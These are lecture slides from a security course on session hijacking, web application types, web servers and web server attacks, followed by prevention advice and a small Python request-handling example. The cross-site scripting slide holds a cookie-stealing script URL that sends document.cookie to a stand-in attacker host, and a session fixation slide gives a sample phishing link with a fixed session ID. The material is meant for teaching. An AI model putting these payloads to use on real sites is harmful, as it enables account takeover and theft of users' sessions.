Week 11
Session Hijacking
CP70044E @2023 2
Today’s agenda
Recap: The 3-Way Handshake
• If the attacker can anticipate the next sequence and ACK number that Bob will send, he/she can spoof Bob's address and start communication with the server.
https://sectigostore.com/blog/session-hijacking-attacks-session-hijacking-explained/
What is a Session?
• A session is a series of interactions between two devices.
https://sectigostore.com/blog/session-hijacking-attacks-session-hijacking-explained/
Session Features
• Sessions remain active while the user remains logged in to the system.
• The session is destroyed when you log out, or after a set period of inactivity on your end. At that point, the user's data is deleted from the allocated memory space.
• Session IDs are a key part of this process. They're a string, usually random and alpha-numeric.
• Depending on how the website is coded, you can find them in cookies, URLs, and hidden fields of websites. For example, in a URL:
  www.mywebsite.com/view/99D5953G6027693
• On an HTML page, a session ID may be stored as a hidden field:
• While session IDs are quite useful, there are also potential security problems associated with their use.
• If someone gets your session ID, they can essentially log in to your account on that website.
• One common issue is that many sites generate session IDs based on predictable variables like the current time or the user's IP address, which makes them easy for an attacker to determine.
• Another issue is that without SSL/TLS, they are transmitted in the open and are susceptible to eavesdropping, which can leave you exposed to session hijacking.
What is Session Hijacking?
• Session hijacking refers to an attack where an attacker takes over a valid TCP communication session between two computers.
• Common session hijacking techniques:
  • Brute Force
  • Session Sniffing
  • Cross-Site Scripting
  • Session Fixation
  • Malware
Session Fixation
• This type of attack relies on a website accepting session IDs from URLs, most often via phishing attempts.
• For instance, an attacker emails a link to a targeted user that contains a particular session ID. When the user clicks the link and logs in to the website, the attacker will know which session ID is being used.
• It can then be used to hijack the session.
https://sectigostore.com/blog/session-hijacking-attacks-session-hijacking-explained/
Session Fixation: Example
• An attacker determines that http://www.unsafewebsite.com/ accepts any session identifier and has no security validation.
• The attacker sends the victim a phishing email, saying "Hello Mark, check out this new account feature from our bank." The link directs the victim to http://unsafewebsite.com/login?SID=123456.
• In this case, the attacker is attempting to fixate the session ID to 123456.
• The victim clicks on the link and the regular login screen pops up. The victim logs on as normal.
• The attacker can now visit http://unsafewebsite.com/?SID=123456 and have full access to the victim's account.
Session Sniffing
• Session sniffing is when an attacker uses a packet sniffer, such as Wireshark, to intercept and log packets as they flow across a network connection.
• Session cookies are part of this traffic, and session sniffing allows an attacker to find and steal them.
• A common vulnerability that leaves a site open to session sniffing is when SSL/TLS encryption is only used on login pages.
• Public Wi-Fi networks are especially vulnerable to this type of session hijacking attack.
https://sectigostore.com/blog/session-hijacking-attacks-session-hijacking-explained/
Cross-Site Scripting
• A cross-site scripting (XSS) attack fools the user's machine into executing malicious code.
• When the script runs, it lets the hacker steal the cookie.
• Server or application vulnerabilities are exploited to inject client-side scripts (usually JavaScript) into webpages, leading the browser to execute the code when it loads the compromised page.
• An example of a cross-site scripting attack to execute session hijacking would be when an attacker sends out emails with a special link to a known, trusted website:
  http://www.yourbankswebsite.com/search?<script>location.href='http://www.evilattacker.com/hijacker.php?cookie='+document.cookie;</script>
• Here the document.cookie command would read the current session cookie and send it to the attacker via the location.href command.
• This is a simplified example, and in a real-world attack the link would most likely employ character encoding and/or URL shortening to hide the suspicious portions of the link.
Malware
• Hackers design the malware to perform packet sniffing and set it to specifically look for session cookies. When it finds one, it then steals it and sends it to the attacker. The malware is basically carrying out an automated session sniffing attack on the user.
Brute Force
• A hacker can attempt to determine the session ID on their own.
• First, they can try to guess the session ID. This can be successful if the session ID is based on an easily predictable variable such as the user's IP address or the current time or date.
How to Prevent Session Hijacking
• Use HTTPS On Your Entire Site
• Use the Secure Cookie Flag
• Use Long and Random Session IDs
• Regenerate the Session ID After Login
• Change the Cookie Value
• Log Out When You're Done
• Use Anti-Malware
• Do Not Accept Session IDs from GET/POST Variables
• Destroy Suspicious Referrers
WEB APPLICATIONS and WEB SERVER CONCEPTS
Web Application
• Most people often confuse web applications and websites.
https://www.shno.co/blog/web-application-examples
Types of web applications
• Static web application
• Dynamic web application
• Single-page web application
• Animated web application
• Portal web application
• Progressive web application
Static web application
• Static web apps appear to the clients the same as they are stored on the server.
• Languages: HTML, JavaScript, etc.
• Animated objects, GIFs, videos.
• However, it is hard to make updates.
• Example: Professional portfolios, digital resumes.
https://www.gurutechnolabs.com/types-of-web-applications/
Dynamic web application
https://www.gurutechnolabs.com/types-of-web-applications/
Single-Page web application
• Single-page apps make it easy for users to use a webpage smoothly.
• This happens because the webpage can quickly send and receive small amounts of data, making everything work well together.
• Languages: HTML, CSS, PHP, ASP.NET, Perl, Python, etc.
• Example: Gmail, PayPal
https://www.gurutechnolabs.com/types-of-web-applications/
Multi-Page web application
• They are websites that consist of multiple interconnected pages, each serving a specific purpose or presenting distinct content.
• Unlike single-page applications (SPAs), which load content dynamically without full-page refreshes, multi-page applications navigate between distinct URLs.
• Example: Amazon, eBay
https://www.gurutechnolabs.com/types-of-web-applications/
Animated web application
• Animated web applications are closely connected with FLASH technology. By creating these types of web apps, you can represent content by using various animated effects.
https://www.gurutechnolabs.com/types-of-web-applications/
Portal web application
• A portal is a type of web app in which various sections or categories are accessible from the home page. This page consists of various details such as chats, emails, forums, user registration, etc.
https://www.gurutechnolabs.com/types-of-web-applications/
Progressive web application
• Progressive web apps enable you to enhance the mobile web experience and provide your services to users despite slow or unreliable internet connections.
https://www.gurutechnolabs.com/types-of-web-applications/
How Web Applications Work
Web Application Architecture
Web Servers
• A web server is a computer that hosts web pages, making them accessible online. When a user loads a site, the web server will retrieve the relevant files and send them to the browser so the user can interact with them.
• Web servers are differentiated by:
  • Operating system support
  • Server-side technologies
  • Security models
  • Client support
  • Development tools
How do Web Servers work?
• When someone wants to load a website, the browser will look for the web server hosting the site's files.
• To achieve this, the web browser translates the site's domain name into an IP address via the Domain Name System (DNS). If the site is frequently visited, the web browser will search through its file cache.
• After finding the corresponding web server, the browser sends an HTTP request to retrieve site content.
• The web server receives and processes the HTTP request through its HTTP server. Once the HTTP server accepts the request, it will search through the database to obtain the relevant data.
• Finally, the server returns the files to the web browser and delivers them to users.
https://www.hostinger.co.uk/tutorials/what-is-a-web-server
HTTP request/response
• User of client machine types in a URL, e.g. http://www.smallco.com/index.html
  client (Netscape)                                server (Apache)
• The client resolves the host name www.smallco.com to the server's IP address:
  client (Netscape)  --->  192.22.107.5  <---  server (Apache)
HTTP request/response
• Client connects to server using IP address and port number
• NB port 80 is default
  client (Netscape)  --- http://www.smallco.com/index.html --->  server (Apache) at 192.22.107.5
Web server basics
• Server determines which file to send
  client (Netscape)  --- http://www.smallco.com/index.html --->  server (Apache)
  "index.html" is really /etc/httpd/htdocs/index.html
  client (Netscape)  <--- HTTP/1.1 200 OK
                          Content-type: text/html
                          [contents of index.html]  ---  server (Apache)
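The request/response exchange on the slides above, from the request line to the mapping of "index.html" onto a file under the document root and the `HTTP/1.1 200 OK` reply, is shown below as an added example; it is not code from the slides, from Apache or from any other server. The document root is a temporary directory created inside `demo()` (standing in for the slide's /etc/httpd/htdocs), the `index.html` content is constructed, and every function name is this example's own. The one check a practitioner wants at this step is also included: the resolved file must stay inside the document root, otherwise the request is answered with 404 rather than served.

```python
import tempfile
from pathlib import Path


def parse_request_line(request_line: str):
    """Split 'GET /index.html HTTP/1.1' into method, target and version."""
    parts = request_line.strip().split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        raise ValueError("malformed request line")
    return parts[0], parts[1], parts[2]


def resolve_document(docroot: Path, target: str):
    """Map the request target onto a file under docroot, the slide's
    '"index.html" is really /etc/httpd/htdocs/index.html' step.
    Returns None when the target resolves outside the document root."""
    path = target.split("?", 1)[0]           # the query string is not a file name
    if path.endswith("/"):
        path += "index.html"                 # directory request -> index file
    root = docroot.resolve()
    candidate = (root / path.lstrip("/")).resolve()
    if candidate != root and root not in candidate.parents:
        return None                          # escaped the document root
    return candidate


def build_response(docroot: Path, request_line: str) -> str:
    """Produce the status line, headers and body the slide shows the server returning."""
    try:
        method, target, _version = parse_request_line(request_line)
    except ValueError:
        return "HTTP/1.1 400 Bad Request\r\n\r\n"
    if method != "GET":
        return "HTTP/1.1 405 Method Not Allowed\r\n\r\n"
    document = resolve_document(docroot, target)
    if document is None or not document.is_file():
        return "HTTP/1.1 404 Not Found\r\n\r\n"
    body = document.read_text()
    return ("HTTP/1.1 200 OK\r\n"
            "Content-type: text/html\r\n"
            f"Content-Length: {len(body.encode())}\r\n"
            "\r\n" + body)


def demo():
    """Serve a constructed index.html from a temporary document root and
    return the status line for three requests."""
    with tempfile.TemporaryDirectory() as tmp:
        docroot = Path(tmp)
        (docroot / "index.html").write_text("<html><body>smallco home</body></html>")
        served = build_response(docroot, "GET /index.html HTTP/1.1")
        missing = build_response(docroot, "GET /nope.html HTTP/1.1")
        outside = build_response(docroot, "GET /../outside.txt HTTP/1.1")
        return (served.split("\r\n")[0],
                missing.split("\r\n")[0],
                outside.split("\r\n")[0])


if __name__ == "__main__":
    for status in demo():
        print(status)
```

`demo()` returns the three status lines (`200 OK` for the index file, `404 Not Found` for a file that does not exist, and `404 Not Found` for a target that resolves above the document root), which is the same decision a production server makes before it reads anything from disk.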
Web Server Features
• File logging. Log files track any events or activities a web server performs, such as requests, security, and error logs.
• Authentication. It often involves asking web users to provide a username and password.
• Bandwidth limiting. Bandwidth limiting controls the speed of responses to ensure that a network can deliver files smoothly.
• Storage space. It refers to the amount of disk space available to store files.
• Load balancing. The purpose of load balancing is to minimize response times and prevent server overload.
• Uptime guarantee. Server uptime tracks how long a web server remains operational to process requests and deliver files. It directly impacts a hosted website's availability. The industry standard is a 99.9% guarantee.
Actors
• There are three types of individuals (actors) who will be interacting with a web server.
Web Server Software
• Apache HTTP Server
• NGINX
• IIS
• Lighttpd
Apache Web Server
• A free and open-source web server used for many operating systems, including Windows, Linux, and macOS. Apache is one of the most popular choices among website owners, developers, and hosting providers, with a market share of over 31%.
• The modules supported by Apache include:
  • Authentication
  • SSL support
  • TLS support
  • PHP
  • HTTP request filtering
Internet Information Server (IIS)
• Developed by Microsoft, IIS is widely used in Windows operating systems. It supports Active Server Pages (ASP), a server-side scripting technology developed by Microsoft for creating dynamic and interactive web applications.
NGINX
• Initially designed only for HTTP web serving, this open-source software now also serves as a reverse proxy, HTTP load balancer, and email proxy. NGINX is known for its speed and ability to handle multiple connections, making it suitable for high-traffic websites.
Lighttpd
• A free and open-source web server software known for its fast data processing with less CPU power. Lighttpd is also popular for its small memory footprint, allowing the server to handle more requests while maintaining responsiveness and performance.
WEB SERVER ATTACKS
DoS/DDoS Attacks
• Attackers may send numerous fake requests to the web server, which results in the web server crashing or becoming unavailable to legitimate users.
DNS Server Hijacking
• The attacker compromises the DNS server and changes the DNS settings so that all requests intended for the target web server are redirected to their own malicious server.
Man-in-the-Middle/Sniffing Attack
• A MITM attack allows an attacker to access sensitive information by intercepting and altering communications between an end user and web servers.
• The attacker acts as a proxy so that all communication between the user and the web server passes through them.
Phishing Attacks
• The attacker tricks the user into submitting login details to a website that looks legitimate but redirects them to a malicious website hosted on the attacker's web server.
• The attacker steals the credentials entered and uses them to impersonate the legitimate user on the website hosted on the legitimate target server.
• The attacker can then perform unauthorised or malicious operations on the website hosted on the target server.
Summary
• Understanding of Session Hijacking Techniques
• Implementation of Session Hijacking Prevention Measures
Thank you very much!
See you next year